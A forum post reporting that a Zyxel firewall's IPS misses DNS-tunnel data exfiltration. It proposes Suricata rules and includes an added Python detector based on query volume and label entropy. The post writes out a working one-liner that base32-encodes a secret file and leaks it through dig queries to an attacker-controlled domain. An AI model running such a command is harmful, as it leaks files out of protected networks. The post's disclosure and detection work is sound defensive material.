IPS - detect DNS data exfiltration

best_heygman (Freshman Member, Posts: 24)
edited February 4 in Security Ideas

Hi, I just tested if my Flex 50H IPS would recognize DNS side-channel data exfiltration. It does not. This really isn't good, because, and you can prove me wrong on this, most people who want an "air gapped network" still allow the devices to access the ZyWall's DNS server, for convenience. The problem is that in most setups the ZyWall will forward the DNS query if it doesn't know the subdomain. That DNS server will do a recursive lookup if it also doesn't know the subdomain. As an attacker, I can just create an NS record for a subdomain I control and point it to some VPS I am hosting. There, I can run something like this to log all DNS queries that reach the server:
https://github.com/KarimPwnz/dns-exfil

In the "air gapped network" I can exfiltrate data with a simple one-liner, like this:
cat /mnt/secret.pdf | base32 -w63 | tr -d = | while read a; do dig $a.exfil.my-domain.net; done;

I would have hoped that the IPS would catch this kind of traffic, since it is extremely unusual. But it does not. I let it run for about 10 minutes, made about 1800 DNS queries that reached my server and exfiltrated about 0.25 MB of data. All that without the IPS of my ZyWall caring about it at all. 1800 DNS queries for different subdomains of the same domain in 10 minutes from the same host really can't realistically be anything but side-channel data exfiltration.

I think you could solve this problem quite easily by adding these rules to your Suricata ruleset. They are MIT licensed:
https://github.com/GDATAAdvancedAnalytics/Suricata-C2/blob/main/DNS/C2_DNS.rules

Here is the article on how these rules were created. I haven't really read it, because I already know how to do it, but since the rules look fine to me, I guess the research methodology of the article should be fine too:
https://cyber.wtf/2024/12/06/detection-of-c2-using-suricata/

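The post's own detection heuristic (many distinct subdomains under one parent zone, from one client, in a ten-minute window) can be checked on the resolver's query log without waiting for an IPS signature. The following is an added example, not code from the post, from Zyxel, or from the linked repositories: it slides a per-(client, zone) window over query records, counts distinct names, and only alerts when the labels in front of the zone also look like encoded payload (high per-character entropy), which keeps a host that legitimately talks to many CDN hostnames below the bar. The log line format, the thresholds (100 distinct names, 3.5 bits per character), and the sample traffic are all assumptions constructed for the example.

```python
"""Added example: volume-plus-entropy detector for DNS-tunnel style exfiltration.
Not from the original post or any Zyxel product; log format and thresholds are assumed."""
import base64
import hashlib
import math
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed thresholds (not from the post); tune per environment.
WINDOW = timedelta(minutes=10)
MAX_DISTINCT = 100          # distinct names under one zone from one client in WINDOW
MIN_LABEL_ENTROPY = 3.5     # bits/char; base32/hex payload labels score well above this


def parent_zone(qname: str, depth: int = 2) -> str:
    """Crude registered-domain extraction: the last `depth` labels (no public suffix list)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-depth:])


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's symbol distribution."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line: str):
    """Constructed log format: '<iso-timestamp> <client-ip> <qtype> <qname>'."""
    ts, client, qtype, qname = line.split()
    return datetime.fromisoformat(ts), client, qtype, qname.lower()


class DnsExfilDetector:
    def __init__(self, window=WINDOW, max_distinct=MAX_DISTINCT, min_entropy=MIN_LABEL_ENTROPY):
        self.window, self.max_distinct, self.min_entropy = window, max_distinct, min_entropy
        self.events = defaultdict(deque)   # (client, zone) -> deque of (timestamp, qname)
        self.alerted = set()               # keys already reported, so each pair alerts once
        self.alerts = []

    def feed(self, ts, client, qname):
        zone = parent_zone(qname)
        key = (client, zone)
        q = self.events[key]
        q.append((ts, qname))
        while q and ts - q[0][0] > self.window:   # drop records that fell out of the window
            q.popleft()
        if key in self.alerted:
            return None
        distinct = {name for _, name in q}
        if len(distinct) < self.max_distinct:
            return None
        # Entropy of the part in front of the zone: encoded payload is near-random,
        # a set of real hostnames (www, mail, cdn, ...) is not.
        prefixes = [name[: -len(zone) - 1].replace(".", "") for name in distinct]
        avg_entropy = sum(shannon_entropy(p) for p in prefixes) / len(prefixes)
        if avg_entropy < self.min_entropy:
            return None
        alert = {"client": client, "zone": zone, "distinct": len(distinct),
                 "avg_label_entropy": round(avg_entropy, 2),
                 "first_seen": q[0][0].isoformat(), "last_seen": ts.isoformat()}
        self.alerted.add(key)
        self.alerts.append(alert)
        return alert

    def process(self, lines):
        for line in lines:
            ts, client, _qtype, qname = parse_line(line)
            self.feed(ts, client, qname)
        return self.alerts


def constructed_log():
    """Constructed sample: one host sending base32-label queries, one host doing normal lookups."""
    base = datetime(2024, 2, 4, 10, 0, 0)
    lines = []
    for i in range(250):   # tunnel-like pattern: 250 unique labels under one zone in 75 seconds
        payload = base64.b32encode(hashlib.sha256(str(i).encode()).digest()).decode().rstrip("=")
        ts = base + timedelta(milliseconds=300 * i)
        lines.append(f"{ts.isoformat()} 192.168.1.23 A {payload}.exfil.my-domain.net")
    for i in range(40):    # benign pattern: few hostnames, queried repeatedly
        host = ["www", "mail", "cdn", "api"][i % 4]
        ts = base + timedelta(seconds=10 * i)
        lines.append(f"{ts.isoformat()} 192.168.1.50 A {host}.example.com")
    return sorted(lines)


def run_demo():
    """Run the detector over the constructed log; returns the list of alerts (one expected)."""
    return DnsExfilDetector().process(constructed_log())


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The two-label zone extraction is deliberately simple; for production use, derive the parent zone with a public suffix list, or the detector will treat every `*.co.uk` name as one zone. The entropy gate is what separates this from a plain rate limit: a busy client hitting hundreds of CDN hostnames will trip the distinct-name count but not the entropy check.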